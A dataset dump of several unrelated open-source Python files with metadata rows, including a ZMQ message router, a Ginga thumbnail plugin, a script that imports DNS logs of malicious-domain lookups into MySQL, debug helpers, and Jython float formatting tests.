# of consecutive integers in the list of indels. Some of the variants that
# are in the list of indels are SNPs that occur within sequences that are
# also part of a length polymorphism. We can just treat them as indels for
# this routine.
c_indels = collapse_indels(indels)
# We also have to adjust the indels: the VCF spec requires that the
# position of the indel be the base *before* the length polymorphism
a_indels = adjust_indels(c_indels, aln)
# Then, print the VCF!
print_vcf(snps, a_indels, chrom, start)
return
main(fa_in)
| unlicense | 4,340,344,280,166,844,000 | 39.180212 | 87 | 0.619207 | false | 3.588198 | false | false | false |
MrYsLab/xideco | xideco/xideco_router/xirt.py | 1 | 5222 | #!/usr/bin/env python3
"""
Created on January 9 11:39:15 2016
@author: Alan Yorinks
Copyright (c) 2016 Alan Yorinks All right reserved.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import signal
import socket
import sys
import time
import zmq
from xideco.data_files.port_map import port_map
# noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences
class XidecoRouter:
"""
This class consists of a PAIR connection to a control program bridge (i.e. - HTTP for Scratch),
creates a publisher for Scratch commands, and creates a set of subscribers to listen
for board data changes.
"""
def __init__(self):
"""
This is the constructor for the XidecoRouter class.
:param: use_port_map: If true, use the ip address in the port map, if false, use discovered ip address
:return: None
"""
# figure out the IP address of the router
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# use the google dns
s.connect(('8.8.8.8', 0))
self.ip_addr = s.getsockname()[0]
# identify the router ip address for the user on the console
print('\nXideco Router - xirt')
print('\n******************************************')
print('Using router IP address = ' + self.ip_addr)
print('******************************************')
# find the path to the data files needed for operation
path = sys.path
self.base_path = None
# get the prefix
prefix = sys.prefix
for p in path:
# make sure the prefix is in the path to avoid false positives
if prefix in p:
# look for the configuration directory
s_path = p + '/xideco/data_files/configuration'
if os.path.isdir(s_path):
# found it, set the base path
self.base_path = p + '/xideco'
break
if not self.base_path:
print('Cannot locate xideco configuration directory.')
sys.exit(0)
print('\nIf using the port map, port_map.py is located at:\n')
print(self.base_path + '/data_files/port_map\n')
print('NOTE: The path to port_map.py may be different')
print('for each Operating System/Computer.')
print('\nSet the router_ip_address entry in port_map.py ')
print('to the address printed above for each ')
print('computer running Xideco, or optionally ')
print('set the address manually for each Xideco module')
print('using the command line options.\n')
self.router = zmq.Context()
# establish router as a ZMQ FORWARDER Device
# subscribe to any message that any entity publishes
self.publish_to_router = self.router.socket(zmq.SUB)
bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[
'publish_to_router_port']
self.publish_to_router.bind(bind_string)
# Don't filter any incoming messages, just pass them through
self.publish_to_router.setsockopt_string(zmq.SUBSCRIBE, '')
# publish these messages
self.subscribe_to_router = self.router.socket(zmq.PUB)
bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[
'subscribe_to_router_port']
self.subscribe_to_router.bind(bind_string)
zmq.device(zmq.FORWARDER, self.publish_to_router, self.subscribe_to_router)
# noinspection PyMethodMayBeStatic
def route(self):
"""
This method runs in a forever loop.
:return:
"""
while True:
try:
time.sleep(.001)
except KeyboardInterrupt:
sys.exit(0)
def clean_up(self):
self.publish_to_router.close()
self.subscribe_to_router.close()
self.router.term()
def xideco_router():
# noinspection PyShadowingNames
xideco_router = XidecoRouter()
xideco_router.route()
# signal handler function called when Control-C occurs
# noinspection PyShadowingNames,PyUnusedLocal,PyUnusedLocal
def signal_handler(signal, frame):
print('Control-C detected. See you soon.')
xideco_router.clean_up()
sys.exit(0)
# listen for SIGINT
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Instantiate the router and start the route loop
if __name__ == '__main__':
xideco_router()
| gpl-3.0 | 2,343,351,559,959,859,700 | 32.909091 | 129 | 0.634048 | false | 4.054348 | false | false | false |
project-asap/IReS-Platform | asap-tools/experiments/depricated/handler/metrics.py | 1 | 1434 | __author__ = 'cmantas'
from tools import *
from json import loads
ms = take_single("select metrics from mahout_kmeans_text where k=15 and documents=90300 and dimensions=53235;")[0]
mj = loads(ms)
cols = iter(["#727272", '#f1595f', '#79c36a', '#599ad3', '#f9a65a','#9e66ab','#cd7058', '#d77fb3'])
def timeline2vaslues(fieldname, metrics):
times =[]
values =[]
for k,v in metrics:
times.append(k)
values.append(v[fieldname])
return times, values
def sum_timeline_vals(fieldnames, metrics):
times =[]
values =[]
for k,v in metrics:
times.append(k)
sum = 0
for i in fieldnames:
if i.startswith("kbps"):
v[i]=int(v[i])
sum += v[i]
values.append(sum)
return times, values
# figure()
fig, ax1 = plt.subplots()
times, values = timeline2vaslues("cpu", mj)
d, = ax1.plot(times, values, color=next(cols))
ax1.set_ylabel('percentage (%)')
times, values = timeline2vaslues("mem", mj)
a, = ax1.plot(times, values, color=next(cols))
ax2 = ax1.twinx()
times, values = sum_timeline_vals(["kbps_read", "kbps_write"], mj)
ax2.set_ylabel("KB/s")
b, = ax2.plot(times, values, color=next(cols))
times, values = sum_timeline_vals(["net_in", "net_out"], mj)
c, = ax2.plot(times, values, color=next(cols))
plt.title("Mahout K-means Cluster Metrics")
plt.legend([d, a, b,c], ["CPU", "MEM", "Disk IO", "Net IO"], loc=3)
show() | apache-2.0 | -2,237,060,242,500,615,200 | 25.090909 | 115 | 0.616457 | false | 2.822835 | false | false | false |
astrofrog/ginga | ginga/gtkw/plugins/Thumbs.py | 1 | 16891 | #
# Thumbs.py -- Thumbnail plugin for fits viewer
#
# Eric Jeschke ([email protected])
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.gtkw import FitsImageGtk as FitsImageGtk
from ginga import GingaPlugin
import os
import time
import hashlib
import gtk
import gobject
from ginga.misc import Bunch
class Thumbs(GingaPlugin.GlobalPlugin):
def __init__(self, fv):
# superclass defines some variables for us, like logger
super(Thumbs, self).__init__(fv)
# For thumbnail pane
self.thumbDict = {}
self.thumbList = []
self.thumbRowList = []
self.thumbNumRows = 20
self.thumbNumCols = 1
self.thumbColCount = 0
# distance in pixels between thumbs
self.thumbSep = 15
# max length of thumb on the long side
self.thumbWidth = 150
prefs = self.fv.get_preferences()
self.settings = prefs.createCategory('plugin_Thumbs')
self.settings.load()
self.thmbtask = None
self.lagtime = 4000
self.keywords = ['OBJECT', 'FRAMEID', 'UT', 'DATE-OBS']
fv.set_callback('add-image', self.add_image)
fv.set_callback('add-channel', self.add_channel)
fv.set_callback('delete-channel', self.delete_channel)
fv.add_callback('active-image', self.focus_cb)
def build_gui(self, container):
width, height = 300, 300
cm, im = self.fv.cm, self.fv.im
tg = FitsImageGtk.FitsImageGtk(logger=self.logger)
tg.configure(200, 200)
tg.enable_autozoom('on')
tg.enable_autocuts('on')
tg.enable_auto_orient(True)
tg.set_makebg(False)
self.thumb_generator = tg
sw = gtk.ScrolledWindow()
sw.set_border_width(2)
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
# Create thumbnails pane
vbox = gtk.VBox(spacing=14)
vbox.set_border_width(4)
self.w.thumbs = vbox
sw.add_with_viewport(vbox)
sw.show_all()
self.w.thumbs_scroll = sw
self.w.thumbs_scroll.connect("size_allocate", self.thumbpane_resized)
#nb.connect("size_allocate", self.thumbpane_resized)
# TODO: should this even have it's own scrolled window?
container.pack_start(sw, fill=True, expand=True)
def add_image(self, viewer, chname, image):
noname = 'Noname' + str(time.time())
name = image.get('name', noname)
path = image.get('path', None)
if path != None:
path = os.path.abspath(path)
thumbname = name
if '.' in thumbname:
thumbname = thumbname.split('.')[0]
self.logger.debug("making thumb for %s" % (thumbname))
# Is there a preference set to avoid making thumbnails?
chinfo = self.fv.get_channelInfo(chname)
prefs = chinfo.prefs
if not prefs.get('genthumb', False):
return
# Is this thumbnail already in the list?
# NOTE: does not handle two separate images with the same name
# in the same channel
thumbkey = (chname.lower(), path)
if self.thumbDict.has_key(thumbkey):
return
#data = image.get_data()
# Get metadata for mouse-over tooltip
header = image.get_header()
metadata = {}
for kwd in self.keywords:
metadata[kwd] = header.get(kwd, 'N/A')
#self.thumb_generator.set_data(data)
self.thumb_generator.set_image(image)
self.copy_attrs(chinfo.fitsimage)
imgwin = self.thumb_generator.get_image_as_widget()
imgwin.set_property("has-tooltip", True)
imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))
self.insert_thumbnail(imgwin, thumbkey, thumbname, chname, name, path)
def _mktt(self, thumbkey, name, metadata):
return lambda tw, x, y, kbmode, ttw: self.query_thumb(thumbkey, name, metadata, x, y, ttw)
def insert_thumbnail(self, imgwin, thumbkey, thumbname, chname, name, path):
vbox = gtk.VBox(spacing=0)
vbox.pack_start(gtk.Label(thumbname), expand=False,
fill=False, padding=0)
evbox = gtk.EventBox()
evbox.add(imgwin)
evbox.connect("button-press-event",
lambda w, e: self.fv.switch_name(chname, name,
path=path))
vbox.pack_start(evbox, expand=False, fill=False)
vbox.show_all()
bnch = Bunch.Bunch(widget=vbox, evbox=evbox)
if self.thumbColCount == 0:
hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep)
self.w.thumbs.pack_start(hbox)
self.thumbRowList.append(hbox)
else:
hbox = self.thumbRowList[-1]
hbox.pack_start(bnch.widget)
self.thumbColCount = (self.thumbColCount + 1) % self.thumbNumCols
self.w.thumbs.show_all()
self.thumbDict[thumbkey] = bnch
self.thumbList.append(thumbkey)
# force scroll to bottom of thumbs
# adj_w = self.w.thumbs_scroll.get_vadjustment()
# max = adj_w.get_upper()
# adj_w.set_value(max)
self.logger.debug("added thumb for %s" % (thumbname))
def reorder_thumbs(self):
# Remove old rows
for hbox in self.thumbRowList:
children = hbox.get_children()
for child in children:
hbox.remove(child)
self.w.thumbs.remove(hbox)
# Add thumbs back in by rows
self.thumbRowList = []
colCount = 0
hbox = None
for thumbkey in self.thumbList:
self.logger.debug("adding thumb for %s" % (str(thumbkey)))
chname, name = thumbkey
bnch = self.thumbDict[thumbkey]
if colCount == 0:
hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep)
hbox.show()
self.w.thumbs.pack_start(hbox)
self.thumbRowList.append(hbox)
hbox.pack_start(bnch.widget)
hbox.show_all()
colCount = (colCount + 1) % self.thumbNumCols
self.thumbColCount = colCount
self.w.thumbs.show_all()
def update_thumbs(self, nameList):
# Remove old thumbs that are not in the dataset
invalid = set(self.thumbList) - set(nameList)
if len(invalid) > 0:
for thumbkey in invalid:
self.thumbList.remove(thumbkey)
del self.thumbDict[thumbkey]
self.reorder_thumbs()
def thumbpane_resized(self, widget, allocation):
x, y, width, height = self.w.thumbs_scroll.get_allocation()
self.logger.debug("reordering thumbs width=%d" % (width))
cols = max(1, width // (self.thumbWidth + self.thumbSep))
if self.thumbNumCols == cols:
# If we have not actually changed the possible number of columns
# then don't do anything
return False
self.logger.debug("column count is now %d" % (cols))
self.thumbNumCols = cols
self.reorder_thumbs()
return False
def query_thumb(self, thumbkey, name, metadata, x, y, ttw):
objtext = 'Object: UNKNOWN'
try:
objtext = 'Object: ' + metadata['OBJECT']
except Exception, e:
self.logger.error("Couldn't determine OBJECT name: %s" % str(e))
uttext = 'UT: UNKNOWN'
try:
uttext = 'UT: ' + metadata['UT']
except Exception, e:
self.logger.error("Couldn't determine UT: %s" % str(e))
chname, path = thumbkey
s = "%s\n%s\n%s\n%s" % (chname, name, objtext, uttext)
ttw.set_text(s)
return True
def clear(self):
self.thumbList = []
self.thumbDict = {}
self.reorder_thumbs()
def add_channel(self, viewer, chinfo):
"""Called when a channel is added from the main interface.
Parameter is chinfo (a bunch)."""
fitsimage = chinfo.fitsimage
fitsimage.add_callback('cut-set', self.cutset_cb)
fitsimage.add_callback('transform', self.transform_cb)
rgbmap = fitsimage.get_rgbmap()
rgbmap.add_callback('changed', self.rgbmap_cb, fitsimage)
def focus_cb(self, viewer, fitsimage):
# Reflect transforms, colormap, etc.
#self.copy_attrs(fitsimage)
self.redo_delay(fitsimage)
def transform_cb(self, fitsimage):
self.redo_delay(fitsimage)
return True
def cutset_cb(self, fitsimage, loval, hival):
self.redo_delay(fitsimage)
return True
def rgbmap_cb(self, rgbmap, fitsimage):
# color mapping has changed in some way
self.redo_delay(fitsimage)
return True
def copy_attrs(self, fitsimage):
# Reflect transforms, colormap, etc.
fitsimage.copy_attributes(self.thumb_generator,
['transforms', 'cutlevels',
'rgbmap'],
redraw=False)
def redo_delay(self, fitsimage):
# Delay regeneration of thumbnail until most changes have propagated
if self.thmbtask != None:
gobject.source_remove(self.thmbtask)
self.thmbtask = gobject.timeout_add(self.lagtime, self.redo_thumbnail,
fitsimage)
return True
def redo_thumbnail(self, fitsimage, save_thumb=None):
self.logger.debug("redoing thumbnail...")
# Get the thumbnail image
image = fitsimage.get_image()
if image == None:
return
if save_thumb == None:
save_thumb = self.settings.get('cacheThumbs', False)
chname = self.fv.get_channelName(fitsimage)
# Get metadata for mouse-over tooltip
header = image.get_header()
metadata = {}
for kwd in self.keywords:
metadata[kwd] = header.get(kwd, 'N/A')
# Look up our version of the thumb
name = image.get('name', None)
path = image.get('path', None)
if path == None:
return
path = os.path.abspath(path)
try:
thumbkey = (chname, path)
bnch = self.thumbDict[thumbkey]
except KeyError:
return
# Generate new thumbnail
# TODO: Can't use set_image() because we will override the saved
# cuts settings...should look into fixing this...
## timage = self.thumb_generator.get_image()
## if timage != image:
## self.thumb_generator.set_image(image)
#data = image.get_data()
#self.thumb_generator.set_data(data)
self.thumb_generator.set_image(image)
fitsimage.copy_attributes(self.thumb_generator,
['transforms', 'cutlevels',
'rgbmap'],
redraw=False)
# Save a thumbnail for future browsing
if save_thumb:
thumbpath = self.get_thumbpath(path)
if thumbpath != None:
self.thumb_generator.save_image_as_file(thumbpath,
format='jpeg')
imgwin = self.thumb_generator.get_image_as_widget()
imgwin.set_property("has-tooltip", True)
imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))
# Replace thumbnail image widget
child = bnch.evbox.get_child()
bnch.evbox.remove(child)
bnch.evbox.add(imgwin)
def delete_channel(self, viewer, chinfo):
"""Called when a channel is deleted from the main interface.
Parameter is chinfo (a bunch)."""
chname_del = chinfo.name.lower()
# TODO: delete thumbs for this channel!
self.logger.info("deleting thumbs for channel '%s'" % (
chname_del))
newThumbList = []
for thumbkey in self.thumbList:
chname, path = thumbkey
if chname != chname_del:
newThumbList.append(thumbkey)
else:
del self.thumbDict[thumbkey]
self.thumbList = newThumbList
self.reorder_thumbs()
def _make_thumb(self, chname, image, path, thumbkey,
save_thumb=False, thumbpath=None):
# This is called by the make_thumbs() as a gui thread
self.thumb_generator.set_image(image)
# Save a thumbnail for future browsing
if save_thumb and (thumbpath != None):
self.thumb_generator.save_image_as_file(thumbpath,
format='jpeg')
imgwin = self.thumb_generator.get_image_as_widget()
# Get metadata for mouse-over tooltip
image = self.thumb_generator.get_image()
header = image.get_header()
metadata = {}
for kwd in self.keywords:
metadata[kwd] = header.get(kwd, 'N/A')
dirname, name = os.path.split(path)
imgwin.set_property("has-tooltip", True)
imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))
thumbname = name
if '.' in thumbname:
thumbname = thumbname.split('.')[0]
self.insert_thumbnail(imgwin, thumbkey, thumbname,
chname, name, path)
self.fv.update_pending(timeout=0.001)
def make_thumbs(self, chname, filelist):
# This is called by the FBrowser plugin, as a non-gui thread!
lcname = chname.lower()
cacheThumbs = self.settings.get('cacheThumbs', False)
for path in filelist:
self.logger.info("generating thumb for %s..." % (
path))
# Do we already have this thumb loaded?
path = os.path.abspath(path)
thumbkey = (lcname, path)
if self.thumbDict.has_key(thumbkey):
continue
# Is there a cached thumbnail image on disk we can use?
save_thumb = cacheThumbs
image = None
thumbpath = self.get_thumbpath(path)
if (thumbpath != None) and os.path.exists(thumbpath):
save_thumb = False
try:
image = self.fv.load_image(thumbpath)
except Exception, e:
pass
try:
if image == None:
image = self.fv.load_image(path)
self.fv.gui_do(self._make_thumb, chname, image, path,
thumbkey, save_thumb=save_thumb,
thumbpath=thumbpath)
except Exception, e:
self.logger.error("Error generating thumbnail for '%s': %s" % (
path, str(e)))
continue
# TODO: generate "broken thumb"?
def _gethex(self, s):
return hashlib.sha1(s).hexdigest()
def get_thumbpath(self, path, makedir=True):
path = os.path.abspath(path)
dirpath, filename = os.path.split(path)
# Get thumb directory
cacheLocation = self.settings.get('cacheLocation', 'local')
if cacheLocation == 'ginga':
# thumbs in .ginga cache
prefs = self.fv.get_preferences()
thumbDir = os.path.join(prefs.get_baseFolder(), 'thumbs')
thumbdir = os.path.join(thumbDir, self._gethex(dirpath))
else:
# thumbs in .thumbs subdirectory of image folder
thumbdir = os.path.join(dirpath, '.thumbs')
if not os.path.exists(thumbdir):
if not makedir:
self.logger.error("Thumb directory does not exist: %s" % (
thumbdir))
return None
try:
os.mkdir(thumbdir)
# Write meta file
metafile = os.path.join(thumbdir, "meta")
with open(metafile, 'w') as out_f:
out_f.write("srcdir: %s\n" % (dirpath))
except OSError, e:
self.logger.error("Could not make thumb directory '%s': %s" % (
thumbdir, str(e)))
return None
# Get location of thumb
modtime = os.stat(path).st_mtime
thumbkey = self._gethex("%s.%s" % (filename, modtime))
thumbpath = os.path.join(thumbdir, thumbkey + ".jpg")
self.logger.debug("thumb path is '%s'" % (thumbpath))
return thumbpath
def __str__(self):
return 'thumbs'
#END
| bsd-3-clause | 6,413,837,330,964,040,000 | 34.116424 | 98 | 0.558759 | false | 3.881204 | false | false | false |
mbudde/mail-indicator | MailIndicator/Debug.py | 1 | 1851 | #
# Copyright (C) 2009 Michael Budde <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import inspect
from functools import wraps
"""Is debugging enabled?"""
DEBUGGING = False
def debug(str):
global DEBUGGING
if not DEBUGGING: return
s = inspect.stack()[1]
print '{file}:{line}:{func}: {msg}'.format(
file=os.path.basename(s[1]),
line=s[2],
func=s[3],
msg=str)
def debugfun(fun):
global DEBUGGING
if not DEBUGGING: return fun
@wraps(fun)
def wrapper(*args, **kwargs):
res = fun(*args, **kwargs)
print('{0} ( {1} {2} ) -> {3}'.format(fun.__name__, args, kwargs, res))
return res
return wrapper
def debugmethod(fun):
@wraps(fun)
def wrapper(klass, *args, **kwargs):
info = {
'file': os.path.basename(inspect.stack()[1][1])[:-3],
'cls': klass.__class__.__name__,
'fun': fun.__name__,
'args': args,
'kwargs': kwargs
}
print('{file}.{cls}.{fun} <-- {args} {kwargs}'.format(**info))
info.update({'res': fun(klass, *args, **kwargs)})
print('{file}.{cls}.{fun} --> {res}'.format(**info))
return info['res']
return wrapper
| gpl-3.0 | -896,696,041,231,857,900 | 30.913793 | 79 | 0.612642 | false | 3.687251 | false | false | false |
madirish/hector | app/scripts/named/named-malware.py | 1 | 10691 | import gzip
from datetime import datetime
import struct, socket
import logging
import os,sys
import MySQLdb
import glob
import yaml
from sys import exc_info
appPath = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../")
sys.path.append(appPath + "/lib/pylib")
from pull_config import Configurator
configr = Configurator()
# Credentials used for the database connection
configr = Configurator()
DB = configr.get_var('db')
HOST = configr.get_var('db_host')
USERNAME = configr.get_var('db_user')
PASSWORD = configr.get_var('db_pass')
#logging set up
logger = logging.getLogger('named_malware.py')
hdlr = logging.FileHandler(appPath + '/logs/message_log')
error_hdlr = logging.FileHandler(appPath + '/logs/error_log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
hdlr.setFormatter(formatter)
error_hdlr.setFormatter(formatter)
error_hdlr.setLevel(logging.ERROR)
logger.addHandler(hdlr)
logger.addHandler(error_hdlr)
logger.setLevel(logging.DEBUG)
logger.debug('args: [\''+('\', \''.join(sys.argv))+'\']')
#config vars
named_dir = configr.get_var('approot')+"app/scripts/named/"
#parse args and read import config
if len(sys.argv)< 2:
logger.error('Config file path required')
exit(1)
try:
import_config=yaml.load(open(sys.argv[1],'r').read())
except:
logger.error('Error loading config file: {0}'.format(sys.argv[1]))
whitelisted_ips = set(import_config['whitelisted_ips'])
src = import_config['named_src']
src_id = -1 #pre database lookup value
chunksize = import_config['chunksize']
archive = import_config['archive']
current_year = datetime.today().year
current_month = datetime.today().month
domains = {}
ips={}
uniq_set = set()
count = 0
conn = None
cursor = None
def connect_db():
global conn,cursor
logger.info("Opening database connection")
conn = MySQLdb.connect(host=HOST,
user=USERNAME,
passwd=PASSWORD,
db=DB)
cursor = conn.cursor()
#Used add the correct year to the date because the logs do not contain the year
def convert_date(d):
dt=datetime.strptime(d,"%b %d %H:%M:%S")
if current_month<12 and dt.month==12:
dt=dt.replace(year=current_year-1)
else:
dt=dt.replace(year=current_year)
return dt.strftime("%Y-%m-%d %H:%M:%S")
#Check if the line is a dns resolution
def is_dns_resolution(l):
return len(l)>8 and l[5]=='client' and l[8]=='query:'
#Checks if the record is unique
#Also add the record to the unique set if it is unique
def is_unique(record):
global uniq_set
if record in uniq_set:
return False
uniq_set.add(record)
return True
#Extracts the date from the line
#Calls convert_date and returns the result
def get_date(l):
date = ' '.join(l[:3])
return convert_date(date)
#Get ip and ip numeric from the ip portion of the log line
def get_ip(ip):
#strip off extra data
ip = ip.split('#')[0]
#Check if the numeric value was computed previously
if ip in ips:
ip_numeric=ips[ip]
else:
#Compute numeric value and store for quick lookup
try:
ip_numeric = struct.unpack('>L',socket.inet_aton(ip))[0]
except:
ip_numeric = -1
logger.error('error with ip numeric for record: {0}'.format(str(l)))
raise
ips[ip]=ip_numeric
return ip,ip_numeric
#Load all malicious domains from database into dictionary object for quick lookup
def load_domains():
global domains
query = "SELECT domain_id, domain_name from domain where domain_is_malicious > 0"
try:
cursor.execute(query)
except AttributeError:
logger.debug('no connection to db. calling connect_db')
connect_db()
cursor.execute(query)
res = cursor.fetchall()
for record in res:
domains[record[1].lower()] = int(record[0])
#Get domain_id for a malicious domain
#Returns -1 if domain is not marked malicious in database
def get_domain_id(domain):
global domains
if len(domains)==0:
load_domains()
domain = domain.lower()
if not domain in domains:
return -1;
domain_id = domains[domain]
return domain_id
#Returns source id for the named source
def get_src_id(src):
global src_id
#If the source id was previously looked up return the locally saved value
if src_id>=0:
return src_id
#Look up the id by source name
query='select named_src_id from named_src where named_src_name=%s'
try:
cursor.execute(query,(src,))
except:
db_connect()
cursor.execute(query,(src,))
res = cursor.fetchone()
#Source was not in database
#Insert the source and return the new id
if res == None:
query = 'insert into named_src set named_src_name=%s'
cursor.execute(query,(src,))
conn.commit()
src_id = int(cursor.lastrowid)
#Source was in database
#Save id for faster lookup
else:
src_id = int(res[0])
return src_id
def proc_line(line):
#split line on spaces
l = line.split()
#check if the line corresponds to a dns resolution
if is_dns_resolution(l):
#get id for malicious domain
dm_id = get_domain_id(l[9])
#If domain has id keep processing else skip record(return -1)
if dm_id > -1:
#Get ip and ip numeric
ip,ip_numeric = get_ip(l[6])
#If ip in whitelist skip record(return -1) else keep processing
if ip not in whitelisted_ips:
#get date
date = get_date(l)
#get src_id
src_id = get_src_id(src)
#return string formatted for import
return ','.join(str(x) for x in [date,ip,ip_numeric,dm_id,src_id])
#Indicate record will not be included in the import (skip record)
return -1
#read gzipped log file line by line and write to files for archive and import
def proc_file(filepath,archive_filepath,chunk_filepath_template,chunksize):
logger.debug('processing file: {0}'.format(filepath))
logger.debug('chunk size: {0}'.format(chunksize))
count = 0
fnumber = 0
fchunkout=None
chunk =''
#open gzipped log file
fin = gzip.open(filepath,'r')
for l in fin:
res = proc_line(l)
#If proc_line returned a formatted line and the line is unique
if res != -1 and is_unique(res):
#add line to chunk variable and inc counter
chunk+=res+'\n'
count+=1
#When chunk reaches the target chunksize write to files
if count % chunksize == 0:
chunk_filepath = chunk_filepath_template.format(fnumber)
write_data(chunk,archive_filepath,chunk_filepath)
fnumber+=1
chunk = ''
#If there is a partial chunk at the end write it to files
if chunk!='':
chunk_filepath = chunk_filepath_template.format(fnumber)
write_data(chunk,archive_filepath,chunk_filepath)
fnumber+=1
fin.close()
logger.info('{0} records written to {1} chunk files'.format(count,fnumber))
return fnumber
#writes chunks to archive(gzipped) file and chunk file
def write_data(data, archive_filepath, chunk_filepath):
if archive:
logger.debug('writing to archive file: {0}'.format(archive_filepath))
archivefile = gzip.open(archive_filepath,'a')
archivefile.write(data)
archivefile.close()
logger.debug('writing to chunk file: {0}'.format(chunk_filepath))
with open(chunk_filepath,'w') as chunkfile:
chunkfile.write(data)
#Import chunk files into database one file at a time
#chunks is a list of numbers corresponding to a chunkfile
#chunk_filepath_template is a string that will produce the
#full file path of the chunk file when given the chunk number
def import_chunks(chunks,chunk_filepath_template):
query = "load data local infile %s into table named_resolution fields terminated by ',' lines terminated by '\n' " + \
"(named_resolution_datetime,named_resolution_src_ip,named_resolution_src_ip_numeric,domain_id, named_src_id)"
for i in chunks:
logger.info('importing chunk: {0:03d}'.format(i))
try:
cursor.execute(query,(chunk_filepath_template.format(i),))
conn.commit()
except AttributeError:
logger.debug('no connection to db. calling connect_db')
connect_db()
cursor.execute(query,(chunk_filepath_template.format(i),))
conn.commit()
except:
logger.error('import chunks error', exc_info=True)
raise
logger.info('importing chunk complete.')
#Deletes chunk files
#chunks is a list of numbers corresponding to a chunkfile
#chunk_filepath_template is a string that will produce the
#full file path of the chunk file when given the chunk number
def delete_chunks(chunks,chunk_filepath_template):
logger.info("Cleaning up chunk files.")
for i in chunks:
chunk_filepath=chunk_filepath_template.format(i)
logger.debug('removing file: {0}'.format(chunk_filepath))
os.remove(chunk_filepath)
if __name__=='__main__':
logger.info('named.py starting')
#Set paths for archive and chunk directories
archive_dir=named_dir+'archive/'+src+'/'
chunk_dir=named_dir+'chunks/'+src+'/'
#Make sure the directories exist
try:
os.makedirs(archive_dir)
except OSError:
logger.debug('dir exists:{0}'.format(archive_dir))
try:
os.makedirs(chunk_dir)
except OSError:
logger.debug('dir exists:{0}'.format(chunk_dir))
#for each file in the to_load directory that is from the source defined in the config
# - Process file and create chunk files and archive file
# - Import the chunkfiles into database
# - Delete chunkfiles
# - Delete original file
files_to_load = glob.glob(named_dir+'to_load/{0}/*.{0}.log.gz'.format(src))
if len(files_to_load) == 0:
logger.warning('No files to load. Exiting')
exit(0)
logger.debug('files to load: {0}'.format(files_to_load))
for f in files_to_load:
uniq_set = set()
filepath=f
basename=os.path.basename(f).split('.log.gz')[0]
chunk_filepath_template=chunk_dir+basename+'.{0}.csv'
archive_filepath=archive_dir+basename+'.csv.gz'
num_chunks = proc_file(filepath,archive_filepath,chunk_filepath_template,chunksize)
import_chunks(xrange(num_chunks),chunk_filepath_template)
delete_chunks(xrange(num_chunks),chunk_filepath_template)
os.remove(f)
conn.close()
logger.info('named.py complete')
| gpl-3.0 | -2,595,943,497,486,646,300 | 32.514107 | 122 | 0.652418 | false | 3.681474 | true | false | false |
mosbasik/buzhug | javasrc/lib/Jython/Lib/test/test_float_jy.py | 9 | 4186 | """Float tests
Made for Jython.
"""
import math
import sys
import unittest
from test import test_support
jython = test_support.is_jython
class FloatTestCase(unittest.TestCase):
def test_float_repr(self):
self.assertEqual(repr(12345678.000000005), '12345678.000000006')
self.assertEqual(repr(12345678.0000000005), '12345678.0')
self.assertEqual(repr(math.pi**-100),
jython and '1.9275814160560203e-50' or '1.9275814160560206e-50')
self.assertEqual(repr(-1.0), '-1.0')
self.assertEqual(repr(-9876.543210),
jython and '-9876.54321' or '-9876.5432099999998')
self.assertEqual(repr(0.123456789e+35), '1.23456789e+34')
def test_float_str(self):
self.assertEqual(str(12345678.000005), '12345678.0')
self.assertEqual(str(12345678.00005),
jython and '12345678.0' or '12345678.0001')
self.assertEqual(str(12345678.00005),
jython and '12345678.0' or '12345678.0001')
self.assertEqual(str(12345678.0005), '12345678.0005')
self.assertEqual(str(math.pi**-100), '1.92758141606e-50')
self.assertEqual(str(0.0), '0.0')
self.assertEqual(str(-1.0), '-1.0')
self.assertEqual(str(-9876.543210), '-9876.54321')
self.assertEqual(str(23456789012E666), 'inf')
self.assertEqual(str(-23456789012E666), '-inf')
def test_float_str_formatting(self):
self.assertEqual('%.13g' % 12345678.00005, '12345678.00005')
self.assertEqual('%.12g' % 12345678.00005,
jython and '12345678' or '12345678.0001')
self.assertEqual('%.11g' % 12345678.00005, '12345678')
# XXX: The exponential formatter isn't totally correct, e.g. our
# output here is really .13g
self.assertEqual('%.12g' % math.pi**-100, '1.92758141606e-50')
self.assertEqual('%.5g' % 123.005, '123')
self.assertEqual('%#.5g' % 123.005, '123.00')
self.assertEqual('%#g' % 0.001, '0.00100000')
self.assertEqual('%#.5g' % 0.001, '0.0010000')
self.assertEqual('%#.1g' % 0.0001, '0.0001')
self.assertEqual('%#.4g' % 100, '100.0')
self.assertEqual('%#.4g' % 100.25, '100.2')
self.assertEqual('%g' % 0.00001, '1e-05')
self.assertEqual('%#g' % 0.00001, '1.00000e-05')
self.assertEqual('%e' % -400.0, '-4.000000e+02')
self.assertEqual('%.2g' % 99, '99')
